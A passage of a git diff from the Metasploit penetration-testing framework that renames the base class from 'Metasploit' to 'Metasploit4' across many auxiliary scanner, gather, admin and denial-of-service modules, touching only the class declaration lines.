Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index ee807a6583..773973688e 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rapid7/nexpose' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index ab4d997c11..8f7bacd0cf 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index ecd8becd89..dd8fb6ca8c 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 147c053cc8..69db942e3a 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'thread' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index 0f3c5b18cf..e908b1bd14 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb index 74d381e2a4..6c8f0d29c3 100644 --- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb +++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Kerberos::Client diff --git a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb index febc605745..43f91cf73e 100644 --- a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb +++ b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 51f6ea0085..383b187968 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb index badbd6770d..4b29d365b7 100644 --- a/modules/auxiliary/dos/dns/bind_tkey.rb +++ b/modules/auxiliary/dos/dns/bind_tkey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index 4f5179fd26..f40516c242 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index 986f6b6c70..e21ccb27b4 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 7d8e3b4c9f..d04a70f6a0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb index 100af11a71..e4aa509cd1 100644 --- a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb +++ b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index e33a8895ed..76f0db506d 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -6,7 +6,7 @@ # auxilary/dos/ssl/openssl_aesni require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index affe62a9f9..8838dd445e 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 6d73acccaa..3eeeb94f06 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/chromecast_wifi.rb b/modules/auxiliary/gather/chromecast_wifi.rb index 545ca56f35..5b0c218f6d 100644 --- a/modules/auxiliary/gather/chromecast_wifi.rb +++ b/modules/auxiliary/gather/chromecast_wifi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/impersonate_ssl.rb b/modules/auxiliary/gather/impersonate_ssl.rb index 6f6c18472f..d6e084f9dd 100644 --- a/modules/auxiliary/gather/impersonate_ssl.rb +++ b/modules/auxiliary/gather/impersonate_ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb b/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb index b0959b4054..60e82d9b5a 100644 --- a/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb +++ b/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb index 2746a2bcc5..ae03c949d8 100644 --- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb +++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/mantisbt_admin_sqli.rb b/modules/auxiliary/gather/mantisbt_admin_sqli.rb index 1900c18a85..71f2c64cbd 100644 --- a/modules/auxiliary/gather/mantisbt_admin_sqli.rb +++ b/modules/auxiliary/gather/mantisbt_admin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb index 7dc176fc69..49278481d6 100644 --- a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb +++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/opennms_xxe.rb b/modules/auxiliary/gather/opennms_xxe.rb index 7a6215fbda..4f60c931a3 100644 --- a/modules/auxiliary/gather/opennms_xxe.rb +++ b/modules/auxiliary/gather/opennms_xxe.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 54524706a2..0c192067d9 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/https' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb index fdb4b3c68c..ab1cdd947e 100644 --- a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb +++ b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index b77e36f1fd..d7add8ec02 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index b2c54bde8c..78ee78a383 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb index 9c4cf1c706..b24065de3a 100644 --- a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb +++ b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb index be8229a861..b3fb9cfa82 100644 --- a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/caidao' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index bed003c58f..5ac407a826 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index e8781a41bd..15d9170e91 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index f39109d09a..deea80733c 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index 05d36726ab..39ff1efbeb 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index 5f22fa6fc7..028e951d5c 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index cd6d7be3c6..5d060660b9 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index 00aeab0e5f..baf50cc32c 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 20017f0f4a..87894f3c57 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 50da62bd4f..760418ed0a 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index 9b2045705a..6724111d4e 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index b676a708d4..de18f8805b 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index 15dfe5fa12..cabefe1b8f 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index d25af0526f..a7ce79c852 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index b410a07c29..fb132e01e5 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index 03bbc52bbf..a9ae93a81b 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 1367d64f29..3892db3191 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_delete_file.rb b/modules/auxiliary/scanner/printer/printer_delete_file.rb index 8f792bd949..4b561b4877 100644 --- a/modules/auxiliary/scanner/printer/printer_delete_file.rb +++ b/modules/auxiliary/scanner/printer/printer_delete_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 6a939e0754..64c04d999d 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index e669a4e1d3..c1546ccb66 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 9eca053e18..49f70ec717 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index f567415532..d596504844 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 7d7b54822e..610a1f6bb4 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_upload_file.rb b/modules/auxiliary/scanner/printer/printer_upload_file.rb index a18d15e72e..3f0fe0229e 100644 --- a/modules/auxiliary/scanner/printer/printer_upload_file.rb +++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index 03c2adb4d7..5171a46a3c 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb index 112bd4266f..3bff4eaa56 100644 --- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb +++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb index a88b514c3d..7865397e71 100644 --- a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb +++ b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index a283d565e3..05ca2b7f4c 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index c1a8bd9a7f..f87e2d65f3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 506411e9db..57af398132 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index f11d403fae..b1d033363b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit4 < 